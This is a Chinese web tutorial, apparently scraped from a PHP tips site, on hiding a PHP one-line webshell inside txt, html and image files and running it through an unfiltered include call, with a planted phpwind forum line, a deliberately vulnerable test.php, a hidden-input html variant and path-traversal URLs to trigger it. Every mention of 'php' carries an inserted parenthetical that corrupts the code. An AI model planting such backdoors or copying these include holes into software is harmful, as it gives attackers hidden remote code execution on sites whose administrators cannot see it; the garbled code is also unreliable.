要知道如果光把php(做为现在的主流开发语言)语句放到图片里是无论如何也不能执行的，因为php(做为现在的主流开发语言)只解析扩展名为php(做为现在的主流开发语言)的文件。所以说要能使隐藏在图片里的php(做为现在的主流开发语言)语句执行。我们就的借助php(做为现在的主流开发语言)中的调用函数 ：include 、require 等。
我们还记得前些日子把木马隐藏到图片的文章吧。也就是在php(做为现在的主流开发语言)文件里用include(x.gif)这样的语句来调用隐藏在图片的木马语句。asp中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点php(做为现在的主流开发语言)的人就不难发现可疑之处。由于url 里用get方式很难传递参数，这就使得插入木马的性能得不到发挥。
include 函数在php(做为现在的主流开发语言)中使用的比较频繁，所以引起的安全问题也实在太多，例如php(做为现在的主流开发语言)wind1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到php(做为现在的主流开发语言)文件中。然后把木马隐藏到图片或html文件里，可以说隐蔽性就更高了。如在php(做为现在的主流开发语言)wind论坛里插入下面的语句：＜‘’?@include includ/.$php(做为现在的主流开发语言)wind_root;? ＜mailto:?@include includ/.$php(做为现在的主流开发语言)wind_root;?＞＞ 一般管理员是无法看出来的。
有了include 函数来辅助帮忙我们就可以把php(做为现在的主流开发语言)木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了，下面我们就依次来做测试。
首先建立一php(做为现在的主流开发语言)文件test.php(做为现在的主流开发语言) 文件内容为:
＜?php(做为现在的主流开发语言)
$test=$_get[test];
@include test/.$test;
?＞ 
txt文件一般都是说明文件，所以我们把一句话木马放到目录的说明文件里就ok了。随便建立一个txt文件t.txt。我们把一句话木马＜?eval($_post[cmd]);?＞粘贴到t.txt文件里。然后访问 http://localhost/test/test.php(做为现在的主流开发语言)?test=../t.txt ＜http://localhost/php(做为现在的主流开发语言)w/index.php(做为现在的主流开发语言)?php(做为现在的主流开发语言)wind_root=../robots.txt＞ 如果你看到t.txt的内容就证明ok了， 然后把在lanker微型php(做为现在的主流开发语言)后门客户端 木马地址添入 http://localhost/test/test.php(做为现在的主流开发语言)?test=../t.txt ＜http://localhost/php(做为现在的主流开发语言)w/index.php(做为现在的主流开发语言)?php(做为现在的主流开发语言)wind_root=../robots.txt＞ 密码里添入cmd就可以了，执行返回的结果都可以看到。
对于html的文件，一般都为模版文件。为了使插入到html的文件的木马能被调用执行而且不被显示出来，我们可以在html里加入一个隐藏属性的文本框 ，如：＜input type=hidden value=＜?eval($_post[cmd]);?＞＞ 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 ＜input type=hidden value=c:uniserver2_7swww est＞ 我可以得到目录为 c:uniserver2_7swww est。
http://www.bkjia.com/phpjc/508706.htmlwww.bkjia.comtruehttp://www.bkjia.com/phpjc/508706.htmltecharticle要知道如果光把php (做为现在的主流开发语言) 语句放到图片里是无论如何也不能执行的，因为php (做为现在的主流开发语言) 只解析扩展名...